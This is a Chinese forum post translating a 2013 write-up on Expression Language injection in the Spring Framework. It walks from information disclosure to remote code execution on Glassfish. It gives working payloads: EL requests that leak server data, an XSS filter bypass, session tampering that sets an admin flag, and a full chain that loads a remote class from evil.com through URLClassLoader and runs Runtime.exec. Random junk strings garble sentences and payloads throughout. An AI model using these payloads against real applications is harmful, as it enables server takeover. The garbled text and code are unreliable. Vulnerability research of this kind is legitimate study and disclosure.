找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2322|回复: 0
打印 上一主题 下一主题

spring-远程代码注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:47:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Remote Code with
3 G  s! r* y0 i8 DExpression Language Injection
0 U+ C1 h) d' @9 J8 I0 J. HSpring Framework脆弱性—DanAmodio( ?6 j- _4 h- X. @
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中4 r. X- T) v6 b8 H, S
可能会存在风险。- u% Q% H0 q' l6 D& }3 T4 r
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的; c( a; u3 P! c0 v# Z, ?
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
& q# i8 W5 t- j- [7 D以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
1 Q$ U- a6 _$ [! i3 o以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前' O  `& t  a: Z- y$ Y6 a! c; @
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。6 n1 m' v: G. y! h; v
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
7 f! x8 `+ l. @; l/ {0 l: m! o我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版8 |; ]6 m' Y: p, _' o6 }" U
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。5 x% J# r( k& n" r5 |  Z
这些版本不支持禁用double EL resolution.7 A- v  b9 s+ b. U% \6 B/ a8 d, {
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含5 h8 f/ ?) w; C4 g$ J5 R* j! X
EL2.2容器上可能进行远程代码执行。
/ ^" I  c) N3 X0 }这是一个原始信息泄露的攻击例子:
) g% w6 E; N, f请求:3 t9 P! W* o5 D
ttp://vulnerable.com/foo?message=${applicationScope}
: b3 U1 L! A" C9 @( \到达以下内容页面:
( a  _  x& P1 G结果将输出一些包含内部服务器信息calsspath 和本地工作目录5 U0 X/ i1 M; w; {+ f! N+ k
你也可以做一些其他事情,如这样:
0 H# m3 W' t' T  S7 G( V% ?${9999+1}& @9 Q6 A' c: e9 d, h
还可以访问session 对象和beans: ^0 L5 ?+ u( f+ Z3 P2 W
${employee.lastName}
. ?" k7 N; t1 K! c2 ^, D  Z在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
4 _; c" q- e! v) qEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东+ E. F. X- L/ d/ u) d9 V5 ]
西,比如XSS.
. F# Y1 C8 @% T4 [哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签1 g& j6 r' v9 @
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
& p; g, f8 X/ w呢?”/ z! d" _+ X4 w- y( ~" n
因此,我尝试巳缦拢�
9 Y7 C/ i; C  B  K) H8 Chttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
% [  X4 t) n# `; e" WP
$ W9 Y7 A1 O$ y% C' o* C3 ^我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
; T4 F3 a* y. t回的文本被插入进了spring:message 标签。# z; ^4 b6 j; ~7 i+ o$ @
这里是一个最终绕过过滤的实例:
; ?# ?1 p. f0 bhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)/scriptQ! _5 L8 ], l: A; \7 w0 Q, G5 [
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为2 l! B" Q, a) G6 s' V
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
6 i/ j( ~! W6 e4 w经过一番研究,我学习到EL2.2 增加了方法调用。
2 s; r5 j: A5 \& ?/ m我写了一个快速测试应用程序代码并且检测一些功能
2 j- H  Y/ _/ J# V' ~) A${pageContext.request.getSession().setAttribute(“account”,”123456″)}0 H9 K- }# J2 N9 g- W" k0 d* p; |
${pageContext.request.getSession().setAttribute(“admin”,true)}
( w1 a. ^* H8 `7 p2 G: w. Y6 g; g好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
$ D! r9 W% S1 C6 U+ N% C指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?+ K+ H6 A4 v( O3 C* T3 ?6 x0 f
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
1 h( \  O& D% g$ c6 e) b“, 1234)}: s  F) u# M: j, ^# s
${“”.getClass().forName(“java.lang.Runtime”)}# n0 U, Z6 [6 c' A2 t: `( v2 }
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
; n& |" Y- m8 m可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
7 T& v: O! V" q8 g9 a4 m数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有4 V0 O/ d# n& C
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
. D8 p& E' x8 M方法签名invoke(Object obj, Object„ args): U5 }/ E: G  x0 U, |
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问) _% b0 N3 b0 H" v+ T, V6 Y/ {
题,以让它可以工作起来。- i1 B' O7 U6 @0 V
漏洞利用:
3 m% j2 O& G/ ?! k: n* p1 g我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
6 D  c7 E. B; \% P3 A8 m' r$ {) u3 y希望你们中的一些JAVA奇才告诉我我是如此的可笑。
& h& v( ^. k% F( c, R% U' n& @# y这里有一些我试过的失败的用例,为了试图让它工作的用例:* ]/ k' f2 k5 i) N% K5 Z7 C
 写文件到文件系统
. Z8 z6 A1 [2 i% Q 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.0 [9 ]$ ?8 h* p7 E2 P. x# m! J
我认为这些可以很好的工作,但是我不能找到合适的类来载入。5 c  w( S, K! W) Z) m
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
4 E* N" G4 \  ]2 Xjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:9 S* s# S: K1 ]  E% r0 Y* \
org.springframework.expression.spel.standard.SpelExpressionParser not found- q. w* O. w" h9 E+ g% }0 Q% y
by
, r. {( x! i( j3 T6 H' C$ x- Eorg.glassfish.web.javax.servlet.jsp [194].) H9 [5 R5 [5 Q3 w: d
 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
. ?* n! Q& m2 Q% s+ [% U/ z5 X9 q3 { 利用反射来创建一个新的Runtime(and watch the world burn)' w% {* r1 J6 G, B- t2 ~
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName2 ]& @6 G3 X0 Q1 ]$ ]$ R
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}( w+ \0 \3 g7 w: P* P
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
7 }# I+ V% M( r' o 使用java.lang.ProcessBuilder* @+ F2 |2 E4 J: K# E  r6 Y: [
 用表达式语言来评估表达式语言3 \& c1 _/ P: o# S8 |0 @3 @2 z* N9 l
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
; h- w5 |1 a6 ]$ b- B${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request$ i8 Q$ n2 M" r5 F: S
“,”".getClass(),null)}
6 I8 S. d' |/ y 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)( z) B* f: q& F7 @0 Z' y  o
我在使用一个空数组通过Method.invoke()时失败了很多次
: B+ b7 F5 T, r+ K& t6 I; M- D( W“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo$ I5 a% W9 [2 U9 q9 ?9 B- i* K
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A* B2 H$ Y  u+ Q9 M
rrayList”).newInstance().toArray())
4 \0 \, S% |& I* o4 ~4 Z( o( `7 @& e) Rjava.lang.IllegalArgumentException: wrong number of arguments
4 [# u4 v/ E$ r& @; k最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可- E. Q) T9 Z9 E$ h* ~% @- X
以创建一个恶意class文件并且指向类装载器.
3 o1 F" h# u/ p+ [5 C我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:9 \  _$ V- l( j; y( q. b  ]* [
public class Malicious {8 `8 l. I$ o6 E; h. E$ [
public Malicious() {
/ D* H# E* R" M0 j3 Xtry {. }" g# Q2 k$ Q& y$ \7 i, j
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac& k4 X# @0 X% e2 y3 y" a
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
& Y/ w9 e" ]: p, v2 g4 D( |: w/ f8 G} catch (Exception e) {
; I6 w' J: e1 O: s: A4 ?}8 ^& l: {# i. n' V, u+ ?* x
}3 @' P' @  x6 V3 _3 v, @, O' O" m
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回7 [% e3 U  Y  T0 H0 L/ Y
话中,因此它可以被使用.1 Z! f! z$ l: d1 J& C9 _2 E9 C' w
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName& n% @3 s6 a4 ?7 W4 m6 C1 l
(“java.util.ArrayList”).newInstance())}: V  N+ G7 K. q2 }, Z
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建4 ]8 M, l0 r  Z! R/ {
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和; F  }4 f$ G& ?4 D: L
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
! j6 {3 r! o& e, D, [我们可以调用的create(string)方法,然后转换对一个URL对象。
& p/ P! C- p1 c  Z${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh! t4 m: U1 E' }/ n4 |1 `
ere/malicious/classfile/is/located/”).toURL())}/ Y) A0 i: @) i2 w$ ]6 O* n
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,  z2 u* g! c; Y% j2 t
恶意类文件被装载并创建,触发远程代码.3 W4 }6 G( Z& [
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
/ _" m9 L$ c3 `9 m( H8 g/ ^xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().2 o8 Z( K3 @9 ?& `$ c0 k
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
& W: k' R' b8 T8 g7 o, {()}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表